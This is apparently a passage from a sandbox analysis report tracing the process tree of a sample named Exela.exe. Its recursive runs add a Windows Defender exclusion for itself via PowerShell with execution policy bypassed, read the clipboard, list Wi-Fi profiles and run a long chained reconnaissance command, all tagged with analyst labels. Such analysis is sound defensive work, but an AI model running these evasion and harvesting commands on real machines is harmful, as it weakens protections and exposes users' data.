        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        128⤵
        
        PID:1460
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        129⤵
        Enumerates processes with tasklist
        
        PID:3164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        128⤵
        Clipboard Data
        
        PID:1552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        129⤵
        Clipboard Data
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        128⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5108
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        129⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        128⤵
        Network Service Discovery
        
        PID:2168
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        129⤵
        Gathers system information
        
        PID:4376
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        129⤵
        
        PID:2648
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        129⤵
        Collects information from the system
        
        PID:1884
        
        C:\Windows\system32\net.exe
        
        net user
        129⤵
        
        PID:2764
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        130⤵
        
        PID:1088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        125⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        125⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        126⤵
        
        PID:3944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        127⤵
        
        PID:544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        124⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        124⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        125⤵
        
        PID:4532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        126⤵
        
        PID:4732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        123⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        123⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        124⤵
        
        PID:1712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        125⤵
        
        PID:560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        122⤵
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        122⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        123⤵
        
        PID:4936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        124⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        121⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        121⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        122⤵
        
        PID:3892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        123⤵
        
        PID:3868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        120⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        120⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        121⤵
        
        PID:4308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        122⤵
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        119⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        119⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        120⤵
        
        PID:2192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        121⤵
        
        PID:1312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        118⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        118⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        119⤵
        
        PID:1680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        120⤵
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        117⤵
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        117⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        118⤵
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        119⤵
        
        PID:4832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        116⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        116⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        117⤵
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        118⤵
        
        PID:3868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        115⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        115⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        116⤵
        
        PID:4048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        117⤵
        
        PID:820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        114⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        114⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        115⤵
        
        PID:1332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        116⤵
        
        PID:4720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        113⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        113⤵
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        114⤵
        
        PID:348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        115⤵
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        112⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        112⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        113⤵
        
        PID:4224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        114⤵
        
        PID:32
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        111⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        111⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        112⤵
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        113⤵
        
        PID:4748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        110⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        110⤵
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        111⤵
        
        PID:4724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        112⤵
        
        PID:4528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        109⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        109⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        110⤵
        
        PID:4040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        111⤵
        
        PID:3576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        108⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        108⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        109⤵
        
        PID:4980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        110⤵
        
        PID:3608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        107⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        107⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        108⤵
        
        PID:4208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        109⤵
        
        PID:1320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        106⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        106⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        107⤵
        
        PID:2888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        108⤵
        
        PID:3652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        105⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        105⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        106⤵
        
        PID:4908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        107⤵
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        104⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        104⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        105⤵
        
        PID:2696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        106⤵
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        103⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        103⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        104⤵
        
        PID:3516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        105⤵
        
        PID:4308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        102⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        102⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        103⤵
        
        PID:2328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        104⤵
        
        PID:4936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        104⤵
        
        PID:3848
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        105⤵
        Detects videocard installed
        
        PID:2332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        104⤵
        
        PID:2648
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        105⤵
        
        PID:576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        104⤵
        
        PID:2720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        104⤵
        
        PID:4620
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        105⤵
        Enumerates processes with tasklist
        
        PID:3716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        104⤵
        
        PID:2096
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        105⤵
        
        PID:2416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        104⤵
        
        PID:3840
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        105⤵
        
        PID:4724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        104⤵
        
        PID:5112
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        105⤵
        Enumerates processes with tasklist
        
        PID:3944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        104⤵
        
        PID:4292
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        105⤵
        Enumerates processes with tasklist
        
        PID:4636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        104⤵
        
        PID:4924
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        105⤵
        
        PID:1596
        
        C:\Windows\system32\chcp.com
        
        chcp
        106⤵
        
        PID:1832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        104⤵
        
        PID:4884
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        105⤵
        
        PID:4968
        
        C:\Windows\system32\chcp.com
        
        chcp
        106⤵
        
        PID:3724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        104⤵
        
        PID:2688
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        105⤵
        Enumerates processes with tasklist
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        104⤵
        Clipboard Data
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        105⤵
        Clipboard Data
        
        PID:452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        104⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4860
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        105⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        104⤵
        Network Service Discovery
        
        PID:3624
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        105⤵
        Gathers system information
        
        PID:3884
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        105⤵
        
        PID:3292
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        105⤵
        Collects information from the system
        
        PID:3456
        
        C:\Windows\system32\net.exe
        
        net user
        105⤵
        
        PID:3944
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        106⤵
        
        PID:4328
        
        C:\Windows\system32\query.exe
        
        query user
        105⤵
        
        PID:4592
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        106⤵
        
        PID:924
        
        C:\Windows\system32\net.exe
        
        net localgroup
        105⤵
        
        PID:4988
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        106⤵
        
        PID:1624
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        105⤵
        
        PID:4736
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        106⤵
        
        PID:3200
        
        C:\Windows\system32\net.exe
        
        net user guest
        105⤵
        
        PID:3904
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        106⤵
        
        PID:3216
        
        C:\Windows\system32\net.exe
        
        net user administrator
        105⤵
        
        PID:4900
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        106⤵
        
        PID:1832
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        105⤵
        
        PID:3188
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        105⤵
        Enumerates processes with tasklist
        
        PID:4884
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        105⤵
        Gathers network information
        
        PID:1496
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        105⤵
        
        PID:3060
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        105⤵
        Network Service Discovery
        
        PID:2372
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        105⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:4760
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        105⤵
        Launches sc.exe
        
        PID:3448
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        105⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2828
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        105⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        104⤵
        
        PID:1980
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        105⤵
        
        PID:3244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        104⤵
        
        PID:2072
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        105⤵
        
        PID:4360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        101⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        101⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        102⤵
        
        PID:4004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        103⤵
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        100⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        100⤵
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        101⤵
        
        PID:4388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        102⤵
        
        PID:4352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        99⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        99⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        100⤵
        
        PID:4376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        101⤵
        
        PID:2904
        
